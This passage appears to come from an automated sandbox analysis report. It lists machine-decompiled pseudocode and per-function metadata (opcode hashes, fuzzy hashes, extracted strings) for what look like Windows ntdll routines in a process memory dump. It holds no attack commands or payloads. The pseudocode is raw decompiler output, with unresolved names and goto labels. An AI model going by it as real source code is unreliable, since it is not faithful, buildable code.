                                  					_t87 = (_t155 << 0xc) + _t139;
                                  					_v60 = _t87;
                                  					if(_t87 < _t139) {
                                  						L11:
                                  						_t166 = _v68;
                                  						L12:
                                  						if(_t132 != 0) {
                                  							E01A7BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                  						}
                                  						L43:
                                  						if(_v72 != 0) {
                                  							_push( *((intOrPtr*)(_t179 + 4)));
                                  							_push( *_t179);
                                  							_push(0x8000);
                                  							E01A7AFDE( &_v72,  &_v60);
                                  						}
                                  						L46:
                                  						return _t166;
                                  					}
                                  					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                  					asm("sbb edi, edi");
                                  					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                  					if(_t90 != 0) {
                                  						_push(0);
                                  						_push(0x14);
                                  						_push( &_v44);
                                  						_push(3);
                                  						_push(_t179);
                                  						_push(0xffffffff);
                                  						if(E019F9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                  							_push(_t139);
                                  							E01A7A80D(_t179, 1, _v40, 0);
                                  							_t172 = 4;
                                  						}
                                  					}
                                  					_t141 =  &_v72;
                                  					if(E01A7A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                  						_v64 = _a4;
                                  						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                  						asm("sbb edi, edi");
                                  						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                  						if(_t94 != 0) {
                                  							_push(0);
                                  							_push(0x14);
                                  							_push( &_v24);
                                  							_push(3);
                                  							_push(_t179);
                                  							_push(0xffffffff);
                                  							if(E019F9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                  								_push(_t141);
                                  								E01A7A80D(_t179, 1, _v20, 0);
                                  								_t176 = 4;
                                  							}
                                  						}
                                  						if(E01A7A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                  							goto L11;
                                  						} else {
                                  							_t177 = _v64;
                                  							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                  							_t100 = _v52 + _v52;
                                  							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                  							 *(_t132 + 0x10) = _t146;
                                  							asm("bsf eax, [esp+0x18]");
                                  							_v52 = _t100;
                                  							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                  							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                  							_t47 =  &_a8;
                                  							 *_t47 = _a8 & 0x00000001;
                                  							if( *_t47 == 0) {
                                  								E019D2280(_t179 + 0x30, _t179 + 0x30);
                                  							}
                                  							_t147 =  *(_t179 + 0x34);
                                  							_t159 =  *(_t179 + 0x38) & 1;
                                  							_v68 = 0;
                                  							if(_t147 == 0) {
                                  								L35:
                                  								E019CB090(_t179 + 0x34, _t147, _v68, _t132);
                                  								if(_a8 == 0) {
                                  									E019CFFB0(_t132, _t177, _t179 + 0x30);
                                  								}
                                  								asm("lock xadd [eax], ecx");
                                  								asm("lock xadd [eax], edx");
                                  								_t132 = 0;
                                  								_v72 = _v72 & 0;
                                  								_v68 = _v72;
                                  								if(E019D7D50() == 0) {
                                  									_t113 = 0x7ffe0388;
                                  								} else {
                                  									_t177 = _v64;
                                  									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                  								}
                                  								if( *_t113 == _t132) {
                                  									_t166 = _v68;
                                  									goto L46;
                                  								} else {
                                  									_t166 = _v68;
                                  									E01A6FEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                  									goto L12;
                                  								}
                                  							} else {
                                  								L23:
                                  								while(1) {
                                  									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                  										_t122 =  *_t147;
                                  										if(_t159 == 0) {
                                  											L32:
                                  											if(_t122 == 0) {
                                  												L34:
                                  												_v68 = 0;
                                  												goto L35;
                                  											}
                                  											L33:
                                  											_t147 = _t122;
                                  											continue;
                                  										}
                                  										if(_t122 == 0) {
                                  											goto L34;
                                  										}
                                  										_t122 = _t122 ^ _t147;
                                  										goto L32;
                                  									}
                                  									_t122 =  *(_t147 + 4);
                                  									if(_t159 == 0) {
                                  										L27:
                                  										if(_t122 != 0) {
                                  											goto L33;
                                  										}
                                  										L28:
                                  										_v68 = 1;
                                  										goto L35;
                                  									}
                                  									if(_t122 == 0) {
                                  										goto L28;
                                  									}
                                  									_t122 = _t122 ^ _t147;
                                  									goto L27;
                                  								}
                                  							}
                                  						}
                                  					}
                                  					_v72 = _v72 & 0x00000000;
                                  					goto L11;
                                  				}
                                  			}

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: `$`
                                  • API String ID: 0-197956300
                                  • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                  • Instruction ID: d00e2bcd7c39f242fcbcb06c7ed1f3351b4a9dc4ed649d6370fe2f0f22d73d88
                                  • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                  • Instruction Fuzzy Hash: 6A918F716043429FE725CF29CD41B1BBBE6AF84714F18896DF699CB280E774EA04CB52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 77%
                                  			E01A351BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                  				signed short* _t63;
                                  				signed int _t64;
                                  				signed int _t65;
                                  				signed int _t67;
                                  				intOrPtr _t74;
                                  				intOrPtr _t84;
                                  				intOrPtr _t88;
                                  				intOrPtr _t94;
                                  				void* _t100;
                                  				void* _t103;
                                  				intOrPtr _t105;
                                  				signed int _t106;
                                  				short* _t108;
                                  				signed int _t110;
                                  				signed int _t113;
                                  				signed int* _t115;
                                  				signed short* _t117;
                                  				void* _t118;
                                  				void* _t119;
                                  
                                  				_push(0x80);
                                  				_push(0x1a905f0);
                                  				E01A0D0E8(__ebx, __edi, __esi);
                                  				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                  				_t115 =  *(_t118 + 0xc);
                                  				 *(_t118 - 0x7c) = _t115;
                                  				 *((char*)(_t118 - 0x65)) = 0;
                                  				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                  				_t113 = 0;
                                  				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                  				 *((intOrPtr*)(_t118 - 4)) = 0;
                                  				_t100 = __ecx;
                                  				if(_t100 == 0) {
                                  					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                  					E019CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                  					 *((char*)(_t118 - 0x65)) = 1;
                                  					_t63 =  *(_t118 - 0x90);
                                  					_t101 = _t63[2];
                                  					_t64 =  *_t63 & 0x0000ffff;
                                  					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                  					L20:
                                  					_t65 = _t64 >> 1;
                                  					L21:
                                  					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                  					if(_t108 == 0) {
                                  						L27:
                                  						 *_t115 = _t65 + 1;
                                  						_t67 = 0xc0000023;
                                  						L28:
                                  						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                  						L29:
                                  						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                  						E01A353CA(0);
                                  						return E01A0D130(0, _t113, _t115);
                                  					}
                                  					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                  						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                  							 *_t108 = 0;
                                  						}
                                  						goto L27;
                                  					}
                                  					 *_t115 = _t65;
                                  					_t115 = _t65 + _t65;
                                  					E019FF3E0(_t108, _t101, _t115);
                                  					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                  					_t67 = 0;
                                  					goto L28;
                                  				}
                                  				_t103 = _t100 - 1;
                                  				if(_t103 == 0) {
                                  					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                  					_t74 = E019D3690(1, _t117, 0x1991810, _t118 - 0x74);
                                  					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                  					_t101 = _t117[2];
                                  					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                  					if(_t74 < 0) {
                                  						_t64 =  *_t117 & 0x0000ffff;
                                  						_t115 =  *(_t118 - 0x7c);
                                  						goto L20;
                                  					}
                                  					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                  					_t115 =  *(_t118 - 0x7c);
                                  					goto L21;
                                  				}
                                  				if(_t103 == 1) {
                                  					_t105 = 4;
                                  					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                  					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                  					_push(_t118 - 0x70);
                                  					_push(0);
                                  					_push(0);
                                  					_push(_t105);
                                  					_push(_t118 - 0x78);
                                  					_push(0x6b);
                                  					 *((intOrPtr*)(_t118 - 0x64)) = E019FAA90();
                                  					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                  					_t113 = L019D4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                  					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                  					if(_t113 != 0) {
                                  						_push(_t118 - 0x70);
                                  						_push( *((intOrPtr*)(_t118 - 0x70)));
                                  						_push(_t113);
                                  						_push(4);
                                  						_push(_t118 - 0x78);
                                  						_push(0x6b);
                                  						_t84 = E019FAA90();
                                  						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                  						if(_t84 < 0) {
                                  							goto L29;
                                  						}
                                  						_t110 = 0;
                                  						_t106 = 0;
                                  						while(1) {
                                  							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                  							 *(_t118 - 0x88) = _t106;
                                  							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                  								break;
                                  							}
                                  							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                  							_t106 = _t106 + 1;
                                  						}
                                  						_t88 = E01A3500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                  						_t119 = _t119 + 0x1c;
                                  						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                  						if(_t88 < 0) {
                                  							goto L29;
                                  						}
                                  						_t101 = _t118 - 0x3c;
                                  						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                  						goto L21;
                                  					}
                                  					_t67 = 0xc0000017;
                                  					goto L28;
                                  				}
                                  				_push(0);
                                  				_push(0x20);
                                  				_push(_t118 - 0x60);
                                  				_push(0x5a);
                                  				_t94 = E019F9860();
                                  				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                  				if(_t94 < 0) {
                                  					goto L29;
                                  				}
                                  				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                  					_t101 = L"Legacy";
                                  					_push(6);
                                  				} else {
                                  					_t101 = L"UEFI";
                                  					_push(4);
                                  				}
                                  				_pop(_t65);
                                  				goto L21;
                                  			}

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: Legacy$UEFI
                                  • API String ID: 2994545307-634100481
                                  • Opcode ID: ce56392d25765921f1f5742541249b3159caf8fd70d10e3a307aa7f3209797b6
                                  • Instruction ID: f0d03f79e90cb20a03ed9319af9f54a2814dd7a11e443f8bcaf35e7f79b2db1c
                                  • Opcode Fuzzy Hash: ce56392d25765921f1f5742541249b3159caf8fd70d10e3a307aa7f3209797b6
                                  • Instruction Fuzzy Hash: 545128B1E006099FDB25DFADC990BAEBBF9BB88700F14402DF649EB251D671D940CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 019DB9A5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID:
                                  • API String ID: 885266447-0
                                  • Opcode ID: f78861d35d8dfc70a5622e974f0b600ff8678dde077788bca9d66ee7f6af3d99
                                  • Instruction ID: 504d62f58ee399898674cbde71ae13eb4bf2fe8a763df4f647796e06cb62c259
                                  • Opcode Fuzzy Hash: f78861d35d8dfc70a5622e974f0b600ff8678dde077788bca9d66ee7f6af3d99
                                  • Instruction Fuzzy Hash: 46515971A08341CFC720DF29C08092BBBE9FB89655F55896EF68A87355D730E844CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 78%
                                  			E019BB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                  				signed int _t65;
                                  				signed short _t69;
                                  				intOrPtr _t70;
                                  				signed short _t85;
                                  				void* _t86;
                                  				signed short _t89;
                                  				signed short _t91;
                                  				intOrPtr _t92;
                                  				intOrPtr _t97;
                                  				intOrPtr* _t98;
                                  				signed short _t99;
                                  				signed short _t101;
                                  				void* _t102;
                                  				char* _t103;
                                  				signed short _t104;
                                  				intOrPtr* _t110;
                                  				void* _t111;
                                  				void* _t114;
                                  				intOrPtr* _t115;
                                  
                                  				_t109 = __esi;
                                  				_t108 = __edi;
                                  				_t106 = __edx;
                                  				_t95 = __ebx;
                                  				_push(0x90);
                                  				_push(0x1a8f7a8);
                                  				E01A0D0E8(__ebx, __edi, __esi);
                                  				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                  				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                  				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                  				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                  				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                  				if(__edx == 0xffffffff) {
                                  					L6:
                                  					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                  					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                  					__eflags = _t65 & 0x00000002;
                                  					if((_t65 & 0x00000002) != 0) {
                                  						L3:
                                  						L4:
                                  						return E01A0D130(_t95, _t108, _t109);
                                  					}
                                  					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                  					_t108 = 0;
                                  					_t109 = 0;
                                  					_t95 = 0;
                                  					__eflags = 0;
                                  					while(1) {
                                  						__eflags = _t95 - 0x200;
                                  						if(_t95 >= 0x200) {
                                  							break;
                                  						}
                                  						E019FD000(0x80);
                                  						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                  						_t108 = _t115;
                                  						_t95 = _t95 - 0xffffff80;
                                  						_t17 = _t114 - 4;
                                  						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                  						__eflags =  *_t17;
                                  						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                  						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                  						_t102 = _t110 + 1;
                                  						do {
                                  							_t85 =  *_t110;
                                  							_t110 = _t110 + 1;
                                  							__eflags = _t85;
                                  						} while (_t85 != 0);
                                  						_t111 = _t110 - _t102;
                                  						_t21 = _t95 - 1; // -129
                                  						_t86 = _t21;
                                  						__eflags = _t111 - _t86;
                                  						if(_t111 > _t86) {
                                  							_t111 = _t86;
                                  						}
                                  						E019FF3E0(_t108, _t106, _t111);
                                  						_t115 = _t115 + 0xc;
                                  						_t103 = _t111 + _t108;
                                  						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                  						_t89 = _t95 - _t111;
                                  						__eflags = _t89;
                                  						_push(0);
                                  						if(_t89 == 0) {
                                  							L15:
                                  							_t109 = 0xc000000d;
                                  							goto L16;
                                  						} else {
                                  							__eflags = _t89 - 0x7fffffff;
                                  							if(_t89 <= 0x7fffffff) {
                                  								L16:
                                  								 *(_t114 - 0x94) = _t109;
                                  								__eflags = _t109;
                                  								if(_t109 < 0) {
                                  									__eflags = _t89;
                                  									if(_t89 != 0) {
                                  										 *_t103 = 0;
                                  									}
                                  									L26:
                                  									 *(_t114 - 0xa0) = _t109;
                                  									 *(_t114 - 4) = 0xfffffffe;
                                  									__eflags = _t109;
                                  									if(_t109 >= 0) {
                                  										L31:
                                  										_t98 = _t108;
                                  										_t39 = _t98 + 1; // 0x1
                                  										_t106 = _t39;
                                  										do {
                                  											_t69 =  *_t98;
                                  											_t98 = _t98 + 1;
                                  											__eflags = _t69;
                                  										} while (_t69 != 0);
                                  										_t99 = _t98 - _t106;
                                  										__eflags = _t99;
                                  										L34:
                                  										_t70 =  *[fs:0x30];
                                  										__eflags =  *((char*)(_t70 + 2));
                                  										if( *((char*)(_t70 + 2)) != 0) {
                                  											L40:
                                  											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                  											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                  											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                  											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                  											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                  											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                  											 *(_t114 - 4) = 1;
                                  											_push(_t114 - 0x74);
                                  											L01A0DEF0(_t99, _t106);
                                  											 *(_t114 - 4) = 0xfffffffe;
                                  											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                  											goto L3;
                                  										}
                                  										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                  										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                  											goto L40;
                                  										}
                                  										_push( *((intOrPtr*)(_t114 + 8)));
                                  										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                  										_push(_t99 & 0x0000ffff);
                                  										_push(_t108);
                                  										_push(1);
                                  										_t101 = E019FB280();
                                  										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                  										if( *((char*)(_t114 + 0x14)) == 1) {
                                  											__eflags = _t101 - 0x80000003;
                                  											if(_t101 == 0x80000003) {
                                  												E019FB7E0(1);
                                  												_t101 = 0;
                                  												__eflags = 0;
                                  											}
                                  										}
                                  										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                  										goto L4;
                                  									}
                                  									__eflags = _t109 - 0x80000005;
                                  									if(_t109 == 0x80000005) {
                                  										continue;
                                  									}
                                  									break;
                                  								}
                                  								 *(_t114 - 0x90) = 0;
                                  								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                  								_t91 = E019FE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                  								_t115 = _t115 + 0x10;
                                  								_t104 = _t91;
                                  								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                  								__eflags = _t104;
                                  								if(_t104 < 0) {
                                  									L21:
                                  									_t109 = 0x80000005;
                                  									 *(_t114 - 0x90) = 0x80000005;
                                  									L22:
                                  									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                  									L23:
                                  									 *(_t114 - 0x94) = _t109;
                                  									goto L26;
                                  								}
                                  								__eflags = _t104 - _t92;
                                  								if(__eflags > 0) {
                                  									goto L21;
                                  								}
                                  								if(__eflags == 0) {
                                  									goto L22;
                                  								}
                                  								goto L23;
                                  							}
                                  							goto L15;
                                  						}
                                  					}
                                  					__eflags = _t109;
                                  					if(_t109 >= 0) {
                                  						goto L31;
                                  					}
                                  					__eflags = _t109 - 0x80000005;
                                  					if(_t109 != 0x80000005) {
                                  						goto L31;
                                  					}
                                  					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                  					_t38 = _t95 - 1; // -129
                                  					_t99 = _t38;
                                  					goto L34;
                                  				}
                                  				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                  					__eflags = __edx - 0x65;
                                  					if(__edx != 0x65) {
                                  						goto L2;
                                  					}
                                  					goto L6;
                                  				}
                                  				L2:
                                  				_push( *((intOrPtr*)(_t114 + 8)));
                                  				_push(_t106);
                                  				if(E019FA890() != 0) {
                                  					goto L6;
                                  				}
                                  				goto L3;
                                  			}























                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: _vswprintf_s
                                  • String ID:
                                  • API String ID: 677850445-0
                                  • Opcode ID: 662d1cb19724aed1ff78a5b5b96b3eb29811eba99d7225011f6ba73a4faafd47
                                  • Instruction ID: 39aab1af8663dfba8e80309622ad278f71ee32fb156fc42288ac81e34fe43778
                                  • Opcode Fuzzy Hash: 662d1cb19724aed1ff78a5b5b96b3eb29811eba99d7225011f6ba73a4faafd47
                                  • Instruction Fuzzy Hash: 6851E175D0025A8EEF32CF6CC944BAEBBB1BF08710F2441ADDD59AB28AD7704941CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: PATH
                                  • API String ID: 0-1036084923
                                  • Opcode ID: 17fa4d539b97e129617e2e5330c5d459d934891a350086982e392be8786926c1
                                  • Instruction ID: 3c7105a7e5152f8db18985e491adf666e248e05a520200384b22373484a4f446
                                  • Opcode Fuzzy Hash: 17fa4d539b97e129617e2e5330c5d459d934891a350086982e392be8786926c1
                                  • Instruction Fuzzy Hash: 8EC1C1B1D00219EFDB26DF98D885BBEBBF9FF48740F484029E509AB250D735A841CB60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 01A2BE0F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                  • API String ID: 0-865735534
                                  • Opcode ID: 1f347c15140605e46d44584e923700faee478f7f403a96c8ff630900365b4b0b
                                  • Instruction ID: 529a4b439cd8fdccf1c875b850ef8d88cd0a4c667c8b369a0e214ea9ca80ffb3
                                  • Opcode Fuzzy Hash: 1f347c15140605e46d44584e923700faee478f7f403a96c8ff630900365b4b0b
                                  • Instruction Fuzzy Hash: 98A12571B006169BEB26CF6CC458BBAB7E5AF48710F14456EDA4ECB681DB30D841CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Re-Waiting
                                  • API String ID: 0-316354757
                                  • Opcode ID: 0479812bf4192ca1fca90edd7e3eba89cbe24236d19e2552d65d312ba4e46522
                                  • Instruction ID: f790254af5f2461ba8706f3167ed356b12f13db41b85c9d81d6b6ce2a34e6eb0
                                  • Opcode Fuzzy Hash: 0479812bf4192ca1fca90edd7e3eba89cbe24236d19e2552d65d312ba4e46522
                                  • Instruction Fuzzy Hash: 84613531A00605AFEB33DFACD984BBE7BE4EB84714F140669E919A72C1C734B941C791
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: `
                                  • API String ID: 0-2679148245
                                  • Opcode ID: a07d7de303f93a257c071ef6107d8af2d0e7dc5d26acf1ee4cb8bc9ce6c716cc
                                  • Instruction ID: d9fe05e8a65258af789419a7087ab3d7a997b06bf6c6502324e3a9c0f7b9b579
                                  • Opcode Fuzzy Hash: a07d7de303f93a257c071ef6107d8af2d0e7dc5d26acf1ee4cb8bc9ce6c716cc
                                  • Instruction Fuzzy Hash: 30518D713043429FE325EF28D980B1BBBF5EBC4614F04492CFA9697290D775E90ACB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: @
                                  • API String ID: 0-2766056989
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: BinaryHash
                                  • API String ID: 0-2202222882
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: `
                                  • API String ID: 0-2679148245
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: BinaryName
                                  • API String ID: 0-215506332
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: @
                                  • API String ID: 0-2766056989
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: WindowsExcludedProcs
                                  • API String ID: 0-3583428290
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: Actx
                                  • API String ID: 0-89312691
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  • Critical error detected %lx, xrefs: 01A68E21
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: Critical error detected %lx
                                  • API String ID: 0-802127002
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 01A4FF60
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                  • API String ID: 0-1911121157
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bc85cecaa2e356b3536842f091161b6a6a49b05f83f054a91a79deb1c04ffad4
                                  • Instruction ID: 6ea278fe06d5f590ba67cfaaef55d4a0832183b6996ae6a56c960de2714c1232
                                  • Opcode Fuzzy Hash: bc85cecaa2e356b3536842f091161b6a6a49b05f83f054a91a79deb1c04ffad4
                                  • Instruction Fuzzy Hash: 50424A75D00229CFEB24DF68C880BA9BBB1FF49314F1581AAD94DEB242E7749985CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a805c79342550bd2344c667299c13e6e4ffe905d497ed370aeadf5d591be166a
                                  • Instruction ID: 196662972fc0df94184e29e91e4ce711ceb52adf68af44a614d6f5160963f4d1
                                  • Opcode Fuzzy Hash: a805c79342550bd2344c667299c13e6e4ffe905d497ed370aeadf5d591be166a
                                  • Instruction Fuzzy Hash: 6DF1AF706083118FCB25CF59C480A7AB7E5FF98714F54892EF98ACB650E734D895CB52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 35bb542e5ba0f2c7a47ecf4047231d0056665d5f09ee3fe2e0f57163195ba6ed
